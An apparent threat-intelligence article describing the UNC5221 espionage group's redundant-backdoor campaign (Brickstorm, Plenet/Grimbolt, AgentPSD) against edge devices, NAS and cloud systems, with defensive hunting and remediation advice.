The Incident: A Network of Backdoors
UNC5221, a Chinese espionage group, has operated since at least 2023, exploiting zero-day vulnerabilities in edge devices. Their deployment of Chinese APT malware constitutes a sustained campaign, not a series of isolated breaches. Initial access to victim networks and Managed Services Providers (MSPs) dates back to September 2023, with intrusions remaining undetected for over 18 months.
Brickstorm was observed in use by April 2024, and by March 2025, breaches discovered indicated it had been used undetected for over a year. VerdantBamboo was found to have compromised an Egnyte Storage Sync system. A victim organization experienced re-breach after remediation efforts that year, demonstrating persistent re-entry.
UNC5221 targets a diverse range of systems, including cloud environments like Microsoft 365, data storage solutions such as Egnyte Storage Sync and Synology NAS devices, and virtualization platforms like VMware vSphere and Dell RecoverPoint for Virtual Machines. They also compromise edge infrastructure like pfSense firewalls and even retired Linux GroupWise email archive servers, alongside Managed Service Providers (MSPs).
Initial access often uses stolen credentials for web SSL VPNs (MITRE ATT&CK T1133, T1078). Attackers sometimes configure new SSL VPN access on a victim’s firewall for re-entry, aiming to blend with legitimate network traffic and bypass Conditional Access policies.
How Chinese APT Malware Ensures Persistent Access: The Redundancy Playbook
UNC5221 does not rely on a single piece of malware. Instead, they build an "access portfolio" with multiple, independent re-entry mechanisms, often involving Chinese APT malware.
Their primary implant is Brickstorm, initially Golang-based, with newer Rust variants. It uses the WebSocket protocol for C2 communications (MITRE ATT&CK T1071.001), leveraging a multiplexing library for simultaneous data streams. This helps it blend with web traffic. BSD variants have been observed on pfSense firewalls. CISA warned about its deployment by Chinese hackers against VMware vSphere, and Google reported its deployment by UNC6201 against Dell RecoverPoint for Virtual Machines. This sophisticated Chinese APT malware is a key component of their strategy.
They also deploy Plenet, which has been identified as Grimbolt. This previously undocumented, cross-platform .NET-based backdoor targets Synology NAS appliances. Plenet provides interactive shell access, remote command execution, and file manipulation (MITRE ATT&CK T1059, T1070.004). Like Brickstorm, it uses WebSocket for C2 and a multiplexing library, offering a distinct path to similar capabilities on different system types. Such diverse Chinese APT malware ensures redundancy.
A third mechanism is AgentPSD, a Python-based reverse shell utility. This serves as a fallback persistence method (MITRE ATT&CK T1505.003), configured to connect to a different domain than Brickstorm. While not always actively used if Brickstorm remains operational, its presence underscores the adversary's intent to establish redundant access points with this Chinese APT malware.
This multi-malware strategy, combined with living-off-the-land techniques (MITRE ATT&CK T1083) and edge device exploitation, complicates eradication. Attackers establish backdoors on firewalls, NAS devices, and Linux archive servers, creating separate entry points. They also use legitimate cloud platforms for C2 cover, such as Google Drive, a tactic observed in other campaigns. This makes command traffic appear as normal user activity (MITRE ATT&CK T1102). The persistent nature of this Chinese APT malware makes detection challenging.
The Real Impact: Re-Breaches and Resource Drain
This strategy has significant practical consequences: an attacker with this access gains deep control over Microsoft 365 environments, enabling long-term espionage and exfiltration of sensitive data, and potentially allowing for the forging of tokens for tenant access (MITRE ATT&CK T1537, T1041). For defenders, the challenge extends beyond initial compromise. When an incident is remediated, the expectation is closure. With UNC5221, this is often not the case. The re-breach of a victim organization after remediation efforts underscores this persistence, often facilitated by hidden Chinese APT malware.
Beyond data loss, a significant issue is the sustained resource drain on security teams. They spend considerable time hunting, containing, and eradicating, only to discover the adversary has another entry point. This undermines confidence in the security posture and exhausts operational capacity. UNC5221's focus on systems lacking EDR solutions, such as many edge devices, exploits common organizational blind spots.
What We Need to Change: Hunting for Access Portfolios
Against adversaries like UNC5221, the traditional "find and fix" model for incident response proves insufficient. The approach must shift from hunting for individual malware instances to identifying entire access portfolios of Chinese APT malware.
When one piece of Chinese APT malware from a sophisticated APT is discovered, the immediate assumption must be that others exist. Defenders should broaden their hunt scope beyond the Windows fleet to encompass all critical layers. This includes edge infrastructure such as VPNs, firewalls, and routers, which often serve as initial access points; Linux systems like NAS and archive servers, frequently overlooked; Windows services; and cloud environments. Such comprehensive coverage requires focused threat hunting across heterogeneous systems.
Internet-facing edge devices are prime entry and re-entry surfaces, often neglected in terms of EDR coverage and deep logging. Effective defense mandates regular configuration audits, log analysis for anomalous connections (MITRE ATT&CK T1090), and integrity checks on these devices. For Windows services, investigations should focus on unexpected service creation (T1543.003), DLL changes, unusual service accounts, or processes launched by services. On Linux, scrutinizing cron jobs (T1053.003) and systemd units (T1543.002) for unauthorized modifications is critical.
Effective defense requires correlating telemetry from all sources: endpoint, identity, proxy, DNS, and cloud storage. A detection on one system might be a symptom of a broader access strategy, not an isolated event. Such correlation is best achieved through a unified security data lake or SIEM.
For high-risk systems, particularly those with broad network access like VPN concentrators or management jump hosts, rebuilding or re-credentialing entirely is often necessary. Simply removing Chinese APT malware risks leaving hidden persistence mechanisms. Foundational controls such as privileged access management, network segmentation (T1562.004), egress monitoring (T1041), a precise asset inventory, and sufficient logging retention across the entire estate constitute prerequisites for effective defense, rather than advanced concepts.
Following any remediation, a defined watch period and renewed hunting efforts are essential. UNC5221 demonstrates a capability for durable, quiet, and reusable access, indicating that treating each detection as an isolated event risks repeated compromise. Therefore, the defensive posture should evolve to anticipate and counter an adversary's full range of access methods, including new Chinese APT malware.
